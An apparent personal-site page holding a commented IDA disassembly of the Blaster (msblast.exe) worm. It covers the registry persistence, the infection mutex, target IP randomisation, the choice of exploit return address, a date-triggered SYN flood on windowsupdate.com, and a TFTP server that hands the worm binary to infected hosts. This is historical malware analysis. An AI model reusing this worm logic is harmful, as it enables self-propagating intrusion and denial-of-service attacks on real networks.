Articles — Projects — LinkedIn — Github — Twitter — Mastodon — Bluesky — About
Commented disassembly, c. 2003-2004
.text:00401000 ;
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ; | This file is generated by The Interactive Disassembler (IDA) |
.text:00401000 ; | Copyright (c) 2003 by DataRescue sa/nv, <ida@datarescue.com> |
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ;
.text:00401000 ; Go to function WinMain() at 00401250 for the beginning of the worm code
.text:00401000 ; itself. Code before 00401250 and after 00402157 is standard CRT stuff and
.text:00401000 ; is therefore not commented.
.text:00401000 ;
.text:00401000 ; ---------------------------------------------------------------------------
.text:00401000 ; File Name : msblast.exe.unpacked
.text:00401000 ; Format : Portable executable for IBM PC (PE)
.text:00401000 ; Section 1. (virtual address 00001000)
.text:00401000 ; Virtual size : 00001458 ( 5208.)
.text:00401000 ; Section size in file : 00001458 ( 5208.)
.text:00401000 ; Offset to raw data for section: 00000400
.text:00401000 ; Flags 60000020: Text Executable Readable
.text:00401000 ; Alignment : 16 bytes ?
.text:00401000
.text:00401000
.text:00401000 unicode macro page,string,zero
.text:00401000 irpc c,<string>
.text:00401000 db '&c', page
.text:00401000 endm
.text:00401000 ifnb <zero>
.text:00401000 dw zero
.text:00401000 endif
.text:00401000 endm
.text:00401000
.text:00401000 model flat
.text:00401000
.text:00401000 ; ---------------------------------------------------------------------------
.text:00401000
.text:00401000 ; Segment type: Pure code
.text:00401000 ; Segment permissions: Read/Execute
.text:00401000 _text segment para public 'CODE' use32
.text:00401000 assume cs:_text
.text:00401000 ;org 401000h
.text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.text:00401000
.text:00401000 loc_401000: ; DATA XREF: sub_401020+Avo
.text:00401000 xor eax, eax
.text:00401002 inc eax
.text:00401003 mov ecx, [esp+4]
.text:00401007 test dword ptr [ecx+4], 6
.text:0040100E jz short locret_40101F
.text:00401010 mov eax, [esp+8]
.text:00401014 mov edx, [esp+10h]
.text:00401018 mov [edx], eax
.text:0040101A mov eax, 3
.text:0040101F
.text:0040101F locret_40101F: ; CODE XREF: .text:0040100E^j
.text:0040101F retn
.text:00401020
.text:00401020 ; =============== S U B R O U T I N E =======================================
.text:00401020
.text:00401020
.text:00401020 sub_401020 proc near ; CODE XREF: .text:0040110Dvp
.text:00401020 ; .text:00401138vp
.text:00401020
.text:00401020 var_8 = dword ptr -8
.text:00401020 arg_0 = dword ptr 10h
.text:00401020 arg_4 = dword ptr 14h
.text:00401020
.text:00401020 push ebx
.text:00401021 push esi
.text:00401022 push edi
.text:00401023 mov eax, [esp+arg_0]
.text:00401027 push eax
.text:00401028 push 0FFFFFFFEh
.text:0040102A push offset loc_401000
.text:0040102F push large dword ptr fs:0
.text:00401036 mov large fs:0, esp
.text:0040103D
.text:0040103D loc_40103D: ; CODE XREF: sub_401020+44vj
.text:0040103D ; sub_401020+4Avj
.text:0040103D mov eax, [esp+10h+arg_0]
.text:00401041 mov ebx, [eax+8]
.text:00401044 mov esi, [eax+0Ch]
.text:00401047 cmp esi, 0FFFFFFFFh
.text:0040104A jz short loc_40106C
.text:0040104C cmp esi, [esp+10h+arg_4]
.text:00401050 jz short loc_40106C
.text:00401052 lea esi, [esi+esi*2]
.text:00401055 mov ecx, [ebx+esi*4]
.text:00401058 mov ecx, [esp+10h+var_8]
.text:0040105C mov ecx, [eax+0Ch]
.text:0040105F cmp dword ptr [ebx+esi*4+4], 0
.text:00401064 jnz short loc_40103D
.text:00401066 call dword ptr [ebx+esi*4+8]
.text:0040106A jmp short loc_40103D
.text:0040106C ; ---------------------------------------------------------------------------
.text:0040106C
.text:0040106C loc_40106C: ; CODE XREF: sub_401020+2A^j
.text:0040106C ; sub_401020+30^j
.text:0040106C pop large dword ptr fs:0
.text:00401073 add esp, 0Ch
.text:00401076 pop edi
.text:00401077 pop esi
.text:00401078 pop ebx
.text:00401079 retn
.text:00401079 sub_401020 endp
.text:00401079
.text:0040107A
.text:0040107A ; =============== S U B R O U T I N E =======================================
.text:0040107A
.text:0040107A ; Attributes: bp-based frame
.text:0040107A
.text:0040107A sub_40107A proc near ; CODE XREF: .text:00401100vp
.text:0040107A
.text:0040107A arg_0 = dword ptr 8
.text:0040107A
.text:0040107A push ebp
.text:0040107B mov ebp, esp
.text:0040107D push ebx
.text:0040107E push esi
.text:0040107F push edi
.text:00401080 push ebp
.text:00401081 push 0
.text:00401083 push 0
.text:00401085 push offset loc_401092
.text:0040108A push [ebp+arg_0]
.text:0040108D call RtlUnwind
.text:00401092
.text:00401092 loc_401092: ; DATA XREF: sub_40107A+B^o
.text:00401092 pop ebp
.text:00401093 pop edi
.text:00401094 pop esi
.text:00401095 pop ebx
.text:00401096 mov esp, ebp
.text:00401098 pop ebp
.text:00401099 retn
.text:00401099 sub_40107A endp
.text:00401099
.text:0040109A ; ---------------------------------------------------------------------------
.text:0040109A
.text:0040109A loc_40109A: ; DATA XREF: start+10vo
.text:0040109A cld
.text:0040109B push ebp
.text:0040109C mov ebp, esp
.text:0040109E sub esp, 8
.text:004010A1 push ebx
.text:004010A2 push esi
.text:004010A3 push edi
.text:004010A4 push ebp
.text:004010A5 mov ebx, [ebp+0Ch]
.text:004010A8 mov eax, [ebp+8]
.text:004010AB mov dword_404030, eax
.text:004010B0 mov dword_404034, ebx
.text:004010B6 test dword ptr [eax+4], 6
.text:004010BD jnz short loc_401131
.text:004010BF mov [ebp-8], eax
.text:004010C2 mov eax, [ebp+10h]
.text:004010C5 mov [ebp-4], eax
.text:004010C8 mov dword_404034, eax
.text:004010CD lea eax, [ebp-8]
.text:004010D0 mov [ebx-4], eax
.text:004010D3 mov esi, [ebx+0Ch]
.text:004010D6 mov edi, [ebx+8]
.text:004010D9
.text:004010D9 loc_4010D9: ; CODE XREF: .text:0040112Bvj
.text:004010D9 cmp esi, 0FFFFFFFFh
.text:004010DC jz short loc_401140
.text:004010DE lea ecx, [esi+esi*2]
.text:004010E1 cmp dword ptr [edi+ecx*4+4], 0
.text:004010E6 jz short loc_401122
.text:004010E8 push esi
.text:004010E9 push ebp
.text:004010EA lea ebp, [ebx+10h]
.text:004010ED call dword ptr [edi+ecx*4+4]
.text:004010F1 pop ebp
.text:004010F2 pop esi
.text:004010F3 mov ebx, [ebp+0Ch]
.text:004010F6 or eax, eax
.text:004010F8 jz short loc_401122
.text:004010FA js short loc_40112D
.text:004010FC mov edi, [ebx+8]
.text:004010FF push ebx
.text:00401100 call sub_40107A
.text:00401105 add esp, 4
.text:00401108 lea ebp, [ebx+10h]
.text:0040110B push esi
.text:0040110C push ebx
.text:0040110D call sub_401020
.text:00401112 add esp, 8
.text:00401115 lea ecx, [esi+esi*2]
.text:00401118 mov eax, [edi+ecx*4]
.text:0040111B mov eax, [ebx+0Ch]
.text:0040111E call dword ptr [edi+ecx*4+8]
.text:00401122
.text:00401122 loc_401122: ; CODE XREF: .text:004010E6^j
.text:00401122 ; .text:004010F8^j
.text:00401122 mov edi, [ebx+8]
.text:00401125 lea ecx, [esi+esi*2]
.text:00401128 mov esi, [edi+ecx*4]
.text:0040112B jmp short loc_4010D9
.text:0040112D ; ---------------------------------------------------------------------------
.text:0040112D
.text:0040112D loc_40112D: ; CODE XREF: .text:004010FA^j
.text:0040112D xor eax, eax
.text:0040112F jmp short loc_4011A2
.text:00401131 ; ---------------------------------------------------------------------------
.text:00401131
.text:00401131 loc_401131: ; CODE XREF: .text:004010BD^j
.text:00401131 push ebp
.text:00401132 lea ebp, [ebx+10h]
.text:00401135 push 0FFFFFFFFh
.text:00401137 push ebx
.text:00401138 call sub_401020
.text:0040113D add esp, 0Ch
.text:00401140
.text:00401140 loc_401140: ; CODE XREF: .text:004010DC^j
.text:00401140 push 0
.text:00401142 mov dword_404010, 0Bh
.text:0040114C push 0Bh
.text:0040114E call signal
.text:00401153 add esp, 8
.text:00401156 or eax, eax
.text:00401158 jnz short loc_40117B
.text:0040115A push 0
.text:0040115C mov dword_404010, 8
.text:00401166 push 8
.text:00401168 call signal
.text:0040116D add esp, 8
.text:00401170 or eax, eax
.text:00401172 jnz short loc_40117B
.text:00401174 mov eax, 1
.text:00401179 jmp short loc_4011A2
.text:0040117B ; ---------------------------------------------------------------------------
.text:0040117B
.text:0040117B loc_40117B: ; CODE XREF: .text:00401158^j
.text:0040117B ; .text:00401172^j
.text:0040117B cmp eax, 0FFFFFFFFh
.text:0040117E jz short loc_4011AA
.text:00401180 push eax
.text:00401181 push dword_404010
.text:00401187 call signal
.text:0040118C add esp, 8
.text:0040118F push dword_404010
.text:00401195 call raise
.text:0040119A add esp, 4
.text:0040119D mov eax, 1
.text:004011A2
.text:004011A2 loc_4011A2: ; CODE XREF: .text:0040112F^j
.text:004011A2 ; .text:00401179^j ...
.text:004011A2 pop ebp
.text:004011A3 pop edi
.text:004011A4 pop esi
.text:004011A5 pop ebx
.text:004011A6 mov esp, ebp
.text:004011A8 pop ebp
.text:004011A9 retn
.text:004011AA ; ---------------------------------------------------------------------------
.text:004011AA
.text:004011AA loc_4011AA: ; CODE XREF: .text:0040117E^j
.text:004011AA cmp dword_40402C, 0
.text:004011B1 jnz short loc_4011BA
.text:004011B3 mov eax, 1
.text:004011B8 jmp short loc_4011A2
.text:004011BA ; ---------------------------------------------------------------------------
.text:004011BA
.text:004011BA loc_4011BA: ; CODE XREF: .text:004011B1^j
.text:004011BA mov eax, dword_40402C
.text:004011BF push 0Bh
.text:004011C1 jmp eax
.text:004011C3 ; ---------------------------------------------------------------------------
.text:004011C3 pop eax
.text:004011C4 mov eax, 1
.text:004011C9 jmp short loc_4011A2
.text:004011CB
.text:004011CB ; =============== S U B R O U T I N E =======================================
.text:004011CB
.text:004011CB ; Attributes: bp-based frame
.text:004011CB
.text:004011CB public start
.text:004011CB start proc near
.text:004011CB
.text:004011CB var_30 = word ptr -30h
.text:004011CB var_18 = dword ptr -18h
.text:004011CB var_4 = dword ptr -4
.text:004011CB
.text:004011CB mov eax, large fs:0
.text:004011D1 push ebp
.text:004011D2 mov ebp, esp
.text:004011D4 push 0FFFFFFFFh
.text:004011D6 push offset unk_40401C
.text:004011DB push offset loc_40109A
.text:004011E0 push eax
.text:004011E1 mov large fs:0, esp
.text:004011E8 sub esp, 10h
.text:004011EB push ebx
.text:004011EC push esi
.text:004011ED push edi
.text:004011EE mov [ebp+var_18], esp
.text:004011F1 push eax
.text:004011F2 fnstcw [esp+30h+var_30]
.text:004011F5 or word ptr [esp], 300h
.text:004011FB fldcw [esp+30h+var_30]
.text:004011FE add esp, 4
.text:00401201 push 0
.text:00401203 push 0
.text:00401205 push offset dword_404028
.text:0040120A push offset dword_404024
.text:0040120F push offset dword_404020
.text:00401214 call __GetMainArgs
.text:00401219 push dword_404028
.text:0040121F push dword_404024
.text:00401225 push dword_404020
.text:0040122B mov dword_404014, esp
.text:00401231 call sub_402254
.text:00401236 add esp, 18h
.text:00401239 xor ecx, ecx
.text:0040123B mov [ebp+var_4], ecx
.text:0040123E push eax
.text:0040123F call exit
.text:00401244 leave
.text:00401245 retn
.text:00401245 start endp
.text:00401245
.text:00401245 ; ---------------------------------------------------------------------------
.text:00401246 align 4
.text:00401248 mov large fs:0, eax
.text:0040124E retn
.text:0040124E ; ---------------------------------------------------------------------------
.text:0040124F align 4
.text:00401250
.text:00401250 ; =============== S U B R O U T I N E =======================================
.text:00401250
.text:00401250 ; Attributes: bp-based frame
.text:00401250
.text:00401250 WinMain proc near ; CODE XREF: sub_402254+5Cvp
.text:00401250
.text:00401250 in = in_addr ptr -3ACh
.text:00401250 var_3A8 = dword ptr -3A8h
.text:00401250 var_3A4 = dword ptr -3A4h
.text:00401250 name = byte ptr -3A0h
.text:00401250 WSAData = WSAData ptr -1A0h
.text:00401250 szMonth = byte ptr -10h
.text:00401250 szDay = byte ptr -0Ch
.text:00401250 hKey = dword ptr -8
.text:00401250 ThreadId = dword ptr -4
.text:00401250
.text:00401250 push ebp
.text:00401251 mov ebp, esp
.text:00401253 sub esp, 3ACh
.text:00401259 push esi
.text:0040125A push edi
.text:0040125B xor esi, esi
.text:0040125D
.text:0040125D Create/open HKLM\Software\Microsoft\Windows\CurrentVersion\Run
.text:0040125D
.text:0040125D push 0 ; lpdwDisposition
.text:0040125F lea eax, [ebp+hKey]
.text:00401262 push eax ; phkResult
.text:00401263 push 0 ; lpSecurityAttributes
.text:00401265 push 0F003Fh ; samDesired
.text:0040126A push 0 ; dwOptions
.text:0040126C push 0 ; lpClass
.text:0040126E push 0 ; Reserved
.text:00401270 push offset aSoftwareMicros ; lpSubKey
.text:00401275 push 80000002h ; hKey = HKEY_LOCAL_MACHINE
.text:0040127A call RegCreateKeyExA
.text:0040127F
.text:0040127F Create "windows auto update" string value = "msblast.exe"
.text:0040127F
.text:0040127F push 32h ; cbData (some extra here after null term)
.text:00401281 push offset aMsblast_exe ; lpData
.text:00401286 push 1 ; dwType = REG_SZ
.text:00401288 push 0 ; Reserved
.text:0040128A push offset aWindowsAutoUpd ; lpValueName
.text:0040128F push [ebp+hKey] ; hKey
.text:00401292 call RegSetValueExA
.text:00401297 push [ebp+hKey] ; hKey
.text:0040129A call RegCloseKey
.text:0040129F
.text:0040129F Create "BILLY" named mutex to prevent multiple infection
.text:0040129F
.text:0040129F push offset aBilly ; lpName
.text:004012A4 push 1 ; bInitialOwner
.text:004012A6 push 0 ; lpMutexAttributes
.text:004012A8 call CreateMutexA
.text:004012AD call GetLastError
.text:004012B2 cmp eax, 0B7h ; 183 (0xB7): mutex already exists
.text:004012B7 jnz short loc_4012C0 ; if BILLY mutex does not exist... continue here
.text:004012B9 push 0 ; uExitCode
.text:004012BB call ExitProcess
.text:004012C0
.text:004012C0 Initialize Winsock
.text:004012C0
.text:004012C0 loc_4012C0: ; CODE XREF: WinMain+67^j
.text:004012C0 lea eax, [ebp+WSAData] ; if BILLY mutex does not exist... continue here
.text:004012C6 push eax ; lpWSAData
.text:004012C7 push 202h ; wVersionRequested (2.2)
.text:004012CC call WSAStartup
.text:004012D1 or eax, eax
.text:004012D3 jz short loc_401304
.text:004012D5 lea eax, [ebp+WSAData]
.text:004012DB push eax ; lpWSAData
.text:004012DC push 101h ; wVersionRequested (1.1)
.text:004012E1 call WSAStartup
.text:004012E6 or eax, eax
.text:004012E8 jz short loc_401304
.text:004012EA lea eax, [ebp+WSAData]
.text:004012F0 push eax ; lpWSAData
.text:004012F1 push 1 ; wVersionRequested (1.0)
.text:004012F3 call WSAStartup
.text:004012F8 or eax, eax
.text:004012FA jz short loc_401304
.text:004012FC or eax, 0FFFFFFFFh
.text:004012FF jmp loc_401570 ; return
.text:00401304 ; ---------------------------------------------------------------------------
.text:00401304
.text:00401304 loc_401304: ; CODE XREF: WinMain+83^j
.text:00401304 ; WinMain+98^j ...
.text:00401304 push 104h ; nSize
.text:00401309 push offset Filename ; lpFilename
.text:0040130E push 0 ; hModule
.text:00401310 call GetModuleFileNameA ; get worm executable's file name (for fopen()'ing later)
.text:00401315
.text:00401315 Wait until host is connected to Internet
.text:00401315
.text:00401315 loc_401315: ; CODE XREF: WinMain+DEvj
.text:00401315 push 0 ; sleep 20 second intervals until connected to Internet
.text:00401317 lea eax, [ebp+ThreadId]
.text:0040131A push eax
.text:0040131B call InternetGetConnectedState
.text:00401320 or eax, eax
.text:00401322 jnz short loc_401330 ; start at beginning of subnet (x.x.x.0)
.text:00401324 push 4E20h ; dwMilliseconds = 20000 (20 seconds)
.text:00401329 call Sleep
.text:0040132E jmp short loc_401315 ; sleep 20 second intervals until connected to Internet
.text:00401330 ; ---------------------------------------------------------------------------
.text:00401330
.text:00401330 Get IP address and selectively apply randomization
.text:00401330
.text:00401330 loc_401330: ; CODE XREF: WinMain+D2^j
.text:00401330 and ds:octet4, 0 ; start at beginning of subnet (x.x.x.0)
.text:00401337 call GetTickCount
.text:0040133C push eax
.text:0040133D call srand ; seed random number generator with GetTickCount()
.text:00401342 pop ecx
.text:00401343 call rand
.text:00401348 mov ecx, 0FEh
.text:0040134D cdq
.text:0040134E idiv ecx
.text:00401350 mov edi, edx
.text:00401352 inc edi
.text:00401353 mov ds:synspoofoctet1, edi ; rand() % 254
.text:00401353 ; make first and second octets of spoofed SYN
.text:00401353 ; source address random at first -- if we can't
.text:00401353 ; get our local IP, then leave these random;
.text:00401353 ; otherwise, replace them with our local IP's
.text:00401353 ; first and second octets
.text:00401359 call rand
.text:0040135E mov ecx, 0FEh
.text:00401363 cdq
.text:00401364 idiv ecx
.text:00401366 mov ds:synspoofoctet2, edx ; rand() % 254
.text:0040136C push 200h ; namelen
.text:00401371 lea eax, [ebp+name]
.text:00401377 push eax ; name
.text:00401378 call gethostname ; get name of local machine for IP lookup
.text:0040137D cmp eax, 0FFFFFFFFh
.text:00401380 jz loc_401476 ; did gethostname() fail?
.text:00401386 lea eax, [ebp+name]
.text:0040138C push eax ; name
.text:0040138D call gethostbyname ; now that we have machine name, get local IP address
.text:00401392 mov [ebp+var_3A4], eax
.text:00401398 or eax, eax
.text:0040139A jz loc_401476 ; did gethostbyname() fail?
.text:004013A0 mov ecx, [eax+0Ch]
.text:004013A3 cmp dword ptr [ecx], 0
.text:004013A6 jz loc_401476 ; is *h_addr_list NULL? (couldn't get a local IP address)
.text:004013AC push 4 ; sizeof(struct in_addr) = 4
.text:004013AE mov eax, [eax+0Ch]
.text:004013B1 push dword ptr [eax] ; use ptr to first address in h_addr_list as source
.text:004013B3 lea eax, [ebp+in]
.text:004013B9 push eax ; dest is &[EBP+in], which is struct in_addr
.text:004013BA call memcpy
.text:004013BF push dword ptr [ebp+in.S_un] ; in
.text:004013C5 call inet_ntoa
.text:004013CA push eax
.text:004013CB push offset aS ; "%s"
.text:004013D0 lea edi, [ebp+name]
.text:004013D6 push edi
.text:004013D7 call sprintf
.text:004013DC push offset a_ ; "."
.text:004013E1 lea eax, [ebp+name]
.text:004013E7 push eax
.text:004013E8 call strtok ; get first octet from IP address string ("." is delimiter)
.text:004013ED mov [ebp+var_3A8], eax
.text:004013F3 push eax
.text:004013F4 call atoi
.text:004013F9 mov ds:octet1, eax
.text:004013FE push offset a_ ; "."
.text:00401403 push 0
.text:00401405 call strtok ; get second octet
.text:0040140A mov [ebp+var_3A8], eax
.text:00401410 push eax
.text:00401411 call atoi
.text:00401416 mov ds:octet2, eax
.text:0040141B push offset a_ ; "."
.text:00401420 push 0
.text:00401422 call strtok ; get third octet
.text:00401427 mov [ebp+var_3A8], eax
.text:0040142D push eax
.text:0040142E call atoi
.text:00401433 add esp, 3Ch
.text:00401436 mov ds:octet3, eax
.text:0040143B cmp eax, 14h
.text:0040143E jle short loc_40145F ; third octet <= 20?
.text:00401440 call GetTickCount
.text:00401445 push eax
.text:00401446 call srand
.text:0040144B pop ecx
.text:0040144C call rand
.text:00401451 mov ecx, 14h
.text:00401456 cdq
.text:00401457 idiv ecx
.text:00401459 sub ds:octet3, edx ; subtract (rand() % 20) from 3rd octet (if it's > 20)
.text:0040145F
.text:0040145F loc_40145F: ; CODE XREF: WinMain+1EE^j
.text:0040145F mov eax, ds:octet1 ; use first and second octets of local IP for
.text:0040145F ; spoofed source address of SYN packets
.text:0040145F ; (this code will only be reached if we were
.text:0040145F ; able to get the local machine's IP address)
.text:00401464 mov ds:synspoofoctet1, eax
.text:00401469 mov eax, ds:octet2
.text:0040146E mov ds:synspoofoctet2, eax
.text:00401473 xor esi, esi
.text:00401475 inc esi ; ESI = 1
.text:00401476
.text:00401476 loc_401476: ; CODE XREF: WinMain+130^j
.text:00401476 ; WinMain+14A^j ...
.text:00401476 call GetTickCount ; jump ahead to here if unable to get local IP
.text:00401476 ; (note that ESI=0 if we jumped here after failing
.text:00401476 ; to get our local IP, meaning that, in that case,
.text:00401476 ; we'll always randomize the initial target IP)
.text:0040147B push eax
.text:0040147C call srand
.text:00401481 pop ecx
.text:00401482 call rand
.text:00401487 mov ecx, 14h
.text:0040148C cdq
.text:0040148D idiv ecx
.text:0040148F cmp edx, 0Ch ; EDX = random number from 0..19
.text:00401492 jge short loc_401496 ; ESI=1: 8/20 (40%) chance
.text:00401494 xor esi, esi ; ESI=0: 12/20 (60%) chance
.text:00401496
.text:00401496 Randomly decide which return address to use in the exploit
.text:00401496 80%: dwWhichRetAddr = 1 -- Windows XP address (0100139Dh)
.text:00401496 20%: dwWhichRetAddr = 2 -- Windows 2000 address (0018759Fh)
.text:00401496
.text:00401496 loc_401496: ; CODE XREF: WinMain+242^j
.text:00401496 mov ds:dwWhichRetAddr, 1
.text:004014A0 call rand
.text:004014A5 mov ecx, 0Ah
.text:004014AA cdq
.text:004014AB idiv ecx
.text:004014AD cmp edx, 7 ; EDX = rand() % 10
.text:004014B0 jle short loc_4014BC ; 8/10 (80%) chance: leave dwWhichRetAddr = 1 (XP ret addr)
.text:004014B2 mov ds:dwWhichRetAddr, 2 ; 2/10 (20%) chance: set to 2 (Windows 2000 ret addr)
.text:004014BC
.text:004014BC 12/20 (60%) chance that the 1st, 2nd, and 3rd octets will be randomized:
.text:004014BC 1st: 1..254
.text:004014BC 2nd: 0..253
.text:004014BC 3rd: 0..253
.text:004014BC
.text:004014BC loc_4014BC: ; CODE XREF: WinMain+260^j
.text:004014BC or esi, esi
.text:004014BE jnz short loc_4014FC ; if ESI=1 (40% chance), DON'T randomize first 3 octets
.text:004014C0 call rand
.text:004014C5 mov ecx, 0FEh
.text:004014CA cdq
.text:004014CB idiv ecx
.text:004014CD mov edi, edx
.text:004014CF inc edi
.text:004014D0 mov ds:octet1, edi ; (rand() % 254) + 1
.text:004014D6 call rand
.text:004014DB mov ecx, 0FEh
.text:004014E0 cdq
.text:004014E1 idiv ecx
.text:004014E3 mov ds:octet2, edx ; rand() % 254
.text:004014E9 call rand
.text:004014EE mov ecx, 0FEh
.text:004014F3 cdq
.text:004014F4 idiv ecx
.text:004014F6 mov ds:octet3, edx ; rand() % 254
.text:004014FC
.text:004014FC Check date to decide whether or not to SYN flood windowsupdate.com
.text:004014FC
.text:004014FC loc_4014FC: ; CODE XREF: WinMain+26E^j
.text:004014FC push 3 ; cchDate
.text:004014FE lea eax, [ebp+szDay]
.text:00401501 push eax ; lpDateStr
.text:00401502 push offset aD ; lpFormat = "d"
.text:00401507 push 0 ; lpDate
.text:00401509 push 0 ; dwFlags
.text:0040150B push 409h ; Locale
.text:00401510 call GetDateFormatA
.text:00401515 push 3 ; cchDate
.text:00401517 lea eax, [ebp+szMonth]
.text:0040151A push eax ; lpDateStr
.text:0040151B push offset aM ; lpFormat = "M"
.text:00401520 push 0 ; lpDate
.text:00401522 push 0 ; dwFlags
.text:00401524 push 409h ; Locale
.text:00401529 call GetDateFormatA
.text:0040152E lea eax, [ebp+szDay]
.text:00401531 push eax
.text:00401532 call atoi
.text:00401537 pop ecx
.text:00401538 cmp eax, 0Fh ; if day is after 15th...
.text:0040153B jg short loc_40154C ; ...then SYN flood windowsupdate.com:80
.text:0040153D lea edi, [ebp+szMonth]
.text:00401540 push edi
.text:00401541 call atoi
.text:00401546 pop ecx
.text:00401547 cmp eax, 8 ; ...or month is after August (8)...
.text:0040154A jle short loc_401562 ; infinitely call infection loop function
.text:0040154C
.text:0040154C If day is > 15 or month > 8 (August), create SYN flood thread
.text:0040154C
.text:0040154C loc_40154C: ; CODE XREF: WinMain+2EB^j
.text:0040154C lea eax, [ebp+ThreadId] ; ...then SYN flood windowsupdate.com:80
.text:0040154F push eax ; lpThreadId
.text:00401550 push 0 ; dwCreationFlags
.text:00401552 push 0 ; lpParameter
.text:00401554 push offset WUSYNFloodThread ; lpStartAddress
.text:00401559 push 0 ; dwStackSize
.text:0040155B push 0 ; lpThreadAttributes
.text:0040155D call CreateThread
.text:00401562
.text:00401562 Infect sequential IP addresses endlessly, 20 hosts at a time
.text:00401562
.text:00401562 loc_401562: ; CODE XREF: WinMain+2FA^j
.text:00401562 ; WinMain+317vj
.text:00401562 call infect20Hosts ; infinitely call infection loop function
.text:00401567 jmp short loc_401562 ; infinitely call infection loop function
.text:00401569 ; ---------------------------------------------------------------------------
.text:00401569 call WSACleanup
.text:0040156E xor eax, eax
.text:00401570
.text:00401570 loc_401570: ; CODE XREF: WinMain+AF^j
.text:00401570 pop edi ; return
.text:00401571 pop esi
.text:00401572 leave
.text:00401573 retn 10h
.text:00401573 WinMain endp
.text:00401573
.text:00401576
.text:00401576 ; =============== S U B R O U T I N E =======================================
.text:00401576
.text:00401576 ; Attributes: bp-based frame
.text:00401576
.text:00401576 TFTPServerThread proc near ; DATA XREF: infectTarget+39Fvo
.text:00401576
.text:00401576 buf = byte ptr -42Ch
.text:00401576 name = sockaddr ptr -228h
.text:00401576 to = sockaddr ptr -218h
.text:00401576 tolen = dword ptr -208h
.text:00401576 var_204 = word ptr -204h
.text:00401576 var_202 = word ptr -202h
.text:00401576 var_200 = byte ptr -200h
.text:00401576
.text:00401576 push ebp
.text:00401577 mov ebp, esp
.text:00401579 sub esp, 42Ch
.text:0040157F push ebx
.text:00401580 push esi
.text:00401581 push edi
.text:00401582 mov dwTFTPInProgress, 1
.text:0040158C
.text:0040158C loc_40158C: ; CODE XREF: TFTPServerThread+16Fvj
.text:0040158C push 0 ; protocol = IPPROTO_IP
.text:0040158E push 2 ; type = SOCK_DGRAM
.text:00401590 push 2 ; af = AF_INET
.text:00401592 call socket
.text:00401597 mov ds:s, eax
.text:0040159C cmp eax, 0FFFFFFFFh
.text:0040159F jz loc_4016EA
.text:004015A5 push 10h
.text:004015A7 push 0
.text:004015A9 lea eax, [ebp+name]
.text:004015AF push eax
.text:004015B0 call memset
.text:004015B5 add esp, 0Ch
.text:004015B8 mov [ebp+name.sa_family], 2
.text:004015C1 push 45h ; hostshort = 69 (TFTP)
.text:004015C3 call htons
.text:004015C8 mov edx, eax
.text:004015CA mov word ptr [ebp+name.sa_data], dx
.text:004015D1 and dword ptr [ebp+name.sa_data+2], 0
.text:004015D8 push 10h ; namelen
.text:004015DA lea eax, [ebp+name]
.text:004015E0 push eax ; name
.text:004015E1 push ds:s ; s
.text:004015E7 call bind
.text:004015EC or eax, eax
.text:004015EE jnz loc_4016EA
.text:004015F4 mov [ebp+tolen], 10h
.text:004015FE lea eax, [ebp+tolen]
.text:00401604 push eax ; fromlen
.text:00401605 lea eax, [ebp+to]
.text:0040160B push eax ; from
.text:0040160C push 0 ; flags
.text:0040160E push 204h ; len
.text:00401613 lea eax, [ebp+buf]
.text:00401619 push eax ; buf
.text:0040161A push ds:s ; s
.text:00401620 call recvfrom
.text:00401625 cmp eax, 1
.text:00401628 jl loc_4016EA
.text:0040162E xor ebx, ebx
.text:00401630 push offset aRb ; "rb"
.text:00401635 push offset Filename ; 260 (104h) = MAX_PATH
.text:0040163A call fopen
.text:0040163F add esp, 8
.text:00401642 mov esi, eax
.text:00401644 or eax, eax
.text:00401646 jz loc_4016EA
.text:0040164C
.text:0040164C loc_40164C: ; CODE XREF: TFTPServerThread+15Dvj
.text:0040164C inc ebx
.text:0040164D push 3 ; hostshort
.text:0040164F call htons
.text:00401654 mov edx, eax
.text:00401656 mov [ebp+var_204], dx ; TFTP packet format: (all network order)
.text:00401656 ; 0000 WORD = 3?
.text:00401656 ; 0002 WORD chunk number (starts at 1)
.text:00401656 ; 0004 start of data
.text:0040165D mov eax, ebx
.text:0040165F and eax, 0FFFFh
.text:00401664 push eax ; hostshort
.text:00401665 call htons
.text:0040166A mov edx, eax
.text:0040166C mov [ebp+var_202], dx
.text:00401673 push esi
.text:00401674 push 200h
.text:00401679 push 1
.text:0040167B lea eax, [ebp+var_200]
.text:00401681 push eax
.text:00401682 call fread
.text:00401687 add esp, 10h
.text:0040168A mov edi, eax ; length actually read
.text:0040168C add edi, 4 ; + 4 (for TFTP header)
.text:0040168F push [ebp+tolen] ; tolen
.text:00401695 lea eax, [ebp+to]
.text:0040169B push eax ; to
.text:0040169C push 0 ; flags
.text:0040169E push edi ; len
.text:0040169F lea eax, [ebp+var_204]
.text:004016A5 push eax ; buf
.text:004016A6 push ds:s ; s
.text:004016AC call sendto
.text:004016B1 cmp eax, 1
.text:004016B4 jl short loc_4016D8
.text:004016B6 push 384h ; dwMilliseconds
.text:004016BB call Sleep ; sleep for 0.9 seconds
.text:004016C0 cmp edi, 204h
.text:004016C6 jnb short loc_4016D3
.text:004016C8 push esi
.text:004016C9 call fclose
.text:004016CE pop ecx
.text:004016CF xor esi, esi
.text:004016D1 jmp short loc_4016D8
.text:004016D3 ; ---------------------------------------------------------------------------
.text:004016D3
.text:004016D3 loc_4016D3: ; CODE XREF: TFTPServerThread+150^j
.text:004016D3 jmp loc_40164C
.text:004016D8 ; ---------------------------------------------------------------------------
.text:004016D8
.text:004016D8 loc_4016D8: ; CODE XREF: TFTPServerThread+13E^j
.text:004016D8 ; TFTPServerThread+15B^j
.text:004016D8 or esi, esi
.text:004016DA jz short loc_4016EA
.text:004016DC push esi
.text:004016DD call fclose
.text:004016E2 pop ecx
.text:004016E3 jmp short loc_4016EA
.text:004016E5 ; ---------------------------------------------------------------------------
.text:004016E5 jmp loc_40158C
.text:004016EA ; ---------------------------------------------------------------------------
.text:004016EA
.text:004016EA loc_4016EA: ; CODE XREF: TFTPServerThread+29^j
.text:004016EA ; TFTPServerThread+78^j ...
.text:004016EA and dwTFTPInProgress, 0
.text:004016F1 push ds:s ; s
.text:004016F7 call closesocket
.text:004016FC push 0 ; dwExitCode
.text:004016FE call ExitThread
.text:00401703 xor eax, eax
.text:00401705 pop edi
.text:00401706 pop esi
.text:00401707 pop ebx
.text:00401708 leave
.text:00401709 retn 4
.text:00401709 TFTPServerThread endp
.text:00401709
.text:0040170C
.text:0040170C ; =============== S U B R O U T I N E =======================================
.text:0040170C
.text:0040170C
